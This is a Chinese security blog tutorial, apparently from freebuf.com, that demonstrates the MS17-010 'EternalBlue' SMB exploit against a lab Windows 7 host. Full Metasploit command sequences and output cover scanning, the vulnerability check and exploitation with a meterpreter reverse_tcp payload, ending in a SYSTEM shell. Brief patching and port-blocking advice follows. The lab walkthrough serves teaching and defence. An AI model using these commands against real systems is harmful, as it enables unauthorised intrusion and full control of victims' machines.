MS17-010″永恒之蓝”漏洞分析 – 作者:LXNSEC

“永恒之蓝”漏洞

2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。 5 月 12 日,不法分子通过改造”永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、 Windows XP、Windows 2003、 Windows Vista、 Windows 7、 Windows 8,Windows 2008、 Windows 2008 R2、Windows Server 2012 SP0。

本次测试环境为 Windows 7 Pro SP1

Win7 IP  192.168.1.2

Kali IP 192.168.1.8

进入 MSF 控制台,找到端口扫描模块,探测目标主机是否开启 445 (SMB) 端口

msf5 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     WordPress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 4
msf5 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

设置端口扫描模块,IP、端口参数

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
msf5 auxiliary(scanner/portscan/syn) > set ports 445
ports => 445
msf5 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      445              yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

 

运行查看测试结果

msf5 > auxiliary(scanner/portscan/syn) > exploit 

[+]  TCP OPEN 192.168.1.2:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

目标主机 445 端口开放

然后探测 445 端口是否运行 SMB 服务

msf5 > search scanner name:smb

Matching Modules
================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   auxiliary/admin/smb/check_dir_file                           normal  No     SMB Scanner Check File/Directory Utility
   1   auxiliary/scanner/sap/sap_smb_relay                          normal  No     SAP SMB Relay Abuse
   2   auxiliary/scanner/smb/pipe_auditor                           normal  No     SMB Session Pipe Auditor
   3   auxiliary/scanner/smb/pipe_dcerpc_auditor                    normal  No     SMB Session Pipe DCERPC Auditor
   4   auxiliary/scanner/smb/smb1                                   normal  No     SMBv1 Protocol Detection
   5   auxiliary/scanner/smb/smb2                                   normal  No     SMB 2.0 Protocol Detection
   6   auxiliary/scanner/smb/smb_enum_gpp                           normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   7   auxiliary/scanner/smb/smb_enumshares                         normal  No     SMB Share Enumeration
   8   auxiliary/scanner/smb/smb_enumusers                          normal  No     SMB User Enumeration (SAM EnumUsers)
   9   auxiliary/scanner/smb/smb_enumusers_domain                   normal  No     SMB Domain User Enumeration
   10  auxiliary/scanner/smb/smb_login                              normal  No     SMB Login Check Scanner
   11  auxiliary/scanner/smb/smb_lookupsid                          normal  No     SMB SID User Enumeration (LookupSid)
   12  auxiliary/scanner/smb/smb_ms17_010                           normal  No     MS17-010 SMB RCE Detection
   13  auxiliary/scanner/smb/smb_version                            normal  No     SMB Version Detection
   14  auxiliary/scanner/snmp/snmp_enumshares                       normal  No     SNMP Windows SMB Share Enumeration


Interact with a module by name or index, for example use 14 or use auxiliary/scanner/snmp/snmp_enumshares

msf5 > use 13
msf5 auxiliary(scanner/smb/smb_version) > options 

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

设置 SMB 探测模块,目标主机参数

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

运行查看效果

msf5 auxiliary(scanner/smb/smb_version) > exploit 

[+] 192.168.1.2:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:H-PC) (workgroup:WORKGROUP ) (signatures:optional)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

目标主机 445端口运行 SMB 服务

接下来探测目标主机是否存在”永恒之蓝”漏洞

msf5 > search auxiliary name:ms17-010

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                     normal  No     MS17-010 SMB RCE Detection


Interact with a module by name or index, for example use 1 or use auxiliary/scanner/smb/smb_ms17_010

msf5 > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

设置”永恒之蓝”探测模块,目标主机参数

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

运行查看探测结果

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.1.2:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

结果显示目标主机存在MS17-010″永恒之蓝”漏洞

接下来需要设置payload,验证一下是否可以获取到目标主机shell

msf5 > search exploit name:ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   2  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   3  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index, for example use 3 or use exploit/windows/smb/ms17_010_psexec

msf5 > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.8      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

我这里面得参数有之前测试设置过得痕迹,一般默认都为空

设置目标主机,也就是被测试主机

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.2
rhosts => 192.168.1.2

设置payload反弹shell的接收主机,也就是测试主机,我这里是Kali(本地主机)

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.8
lhost => 192.168.1.8

设置目标主机操作系统类型,这个payload的target参数选项只有一个,不用进行变动

msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

运行查看测试结果

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] 192.168.1.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.2:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.2:445       - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.2:445 - Connecting to target for exploitation.
[+] 192.168.1.2:445 - Connection established for exploitation.
[+] 192.168.1.2:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.2:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.2:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.2:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.2:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.1.2:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.2:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.2:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.2:445 - Starting non-paged pool grooming
[+] 192.168.1.2:445 - Sending SMBv2 buffers
[+] 192.168.1.2:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.2:445 - Sending final SMBv2 buffers.
[*] 192.168.1.2:445 - Sending last fragment of exploit packet!
[*] 192.168.1.2:445 - Receiving response from exploit packet
[+] 192.168.1.2:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.2:445 - Sending egg to corrupted connection.
[*] 192.168.1.2:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.2:49214) at 2020-07-23 10:32:15 +0800
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > pwd
C:\Windows\system32

获取到目标主机shell,system权限,此权限危害较高,可以窃取用户键盘记录、实时屏幕、关闭/添加进程等操作。

“永恒之蓝”应对方法

1.升级微软补丁MS17-010

2.Windows7、Windows8、Windows10电脑启用Windows防火墙添加策略关闭135、137、138、139、445端口

3.(若有杀软)升级杀毒软件最新版本

 

 

来源:freebuf.com 2020-07-24 10:03:26 by: LXNSEC

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论